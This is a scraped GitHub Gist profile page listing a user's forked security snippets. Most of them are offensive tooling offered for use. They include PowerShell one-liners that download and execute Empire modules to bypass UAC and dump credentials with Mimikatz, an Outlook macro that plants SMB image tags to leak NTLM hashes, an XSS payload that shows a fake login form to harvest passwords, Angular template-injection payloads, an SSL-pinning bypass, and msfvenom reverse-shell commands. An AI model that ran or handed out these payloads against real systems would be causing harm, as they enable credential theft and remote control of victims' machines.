Skip to content

Instantly share code, notes, and snippets.

View lolici123's full-sized avatar

lolici123

2 followers · 8 following
View GitHub Profile
@lolici123
lolici123 / JavascriptRecon.md
Created February 13, 2023 14:19
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@lolici123
lolici123 / RedTeam_CheatSheet.ps1
Created October 29, 2022 02:14 — forked from sdcampbell/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@lolici123
lolici123 / Outlook-Addin-SMB-Image-Tag.txt
Created October 29, 2022 02:14 — forked from sdcampbell/Outlook-Addin-SMB-Image-Tag.txt
Sub HTMLMessage()
Dim objOutlookMsg As Outlook.MailItem
Dim message, title, defaultValue As String
Dim myValue As String
' prompt for user input.
message = "Enter SMB Tag(s)"
' Set popup box title.
title = "SMB Input Box"
defaultValue = "<img src='file://IPADDRESS/image/signature.jpg'><img src='file:\\IPADDRESS\image\signature.jpg'>"
' Prompt input box
@lolici123
lolici123 / creds.js
Created October 29, 2022 02:13 — forked from sdcampbell/creds.js
XSS payload
var html = `
<div id="bg" style="position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0">
</div>
<div id="form" style="position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px">
<p>An error occurred. Please login again.</p>
<form method="GET" action="https://127.0.0.1:443/">
<p>Username <input type="text" name="username"></p>
<p>Password <input type="password" name="password"></p>
<p><input type="submit" value="Login"></p>
</form>
@lolici123
lolici123 / frida_multiple_unpinning.js
Created October 24, 2022 19:27 — forked from akabe1/frida_multiple_unpinning.js
Another Android ssl certificate pinning bypass for various methods
/* Android ssl certificate pinning bypass script for various methods
by Maurizio Siddu
Run with:
frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause
*/
setTimeout(function() {
Java.perform(function() {
console.log('');
@lolici123
lolici123 / A Readme for Adding Certs.md
Created January 21, 2021 20:09 — forked from Artistan/A Readme for Adding Certs.md
Add new certificate (cert) from local/internal intranet to your mac

Add a cert to you macbook

USAGE

~/add_cert.sh my.intra.net

you will be asked for your password to add thit to keychain

  • downloads pem file
  • adds to trusted root certificates
@lolici123
lolici123 / AngularTI.md
Created January 10, 2021 15:53 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@lolici123
lolici123 / Wireless Penetration Testing Cheat Sheet.md
Created May 9, 2020 14:40 — forked from dogrocker/Wireless Penetration Testing Cheat Sheet.md
Wireless Penetration Testing Cheat Sheet

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
@lolici123
lolici123 / revip.py
Created April 24, 2019 06:48 — forked from ayoubfathi/revip.py
Using YouGetSignal API to get domains hosted on the same IP - Reverse IP
import requests
import json
import sys
import argparse
_strip = ['http://', 'https://', 'www']
G = '\033[92m'
Y = '\033[93m'
@lolici123
lolici123 / create metasploit payloads.sh
Created September 24, 2018 07:00 — forked from leveled/create metasploit payloads.sh
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf #Create ELF file
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe #Create .exe file
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho #Create Mach-O file
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php #Reverse PHP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp #Reverse ASP Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp #Reverse JSP Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war #Reverse WAR Shell
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your P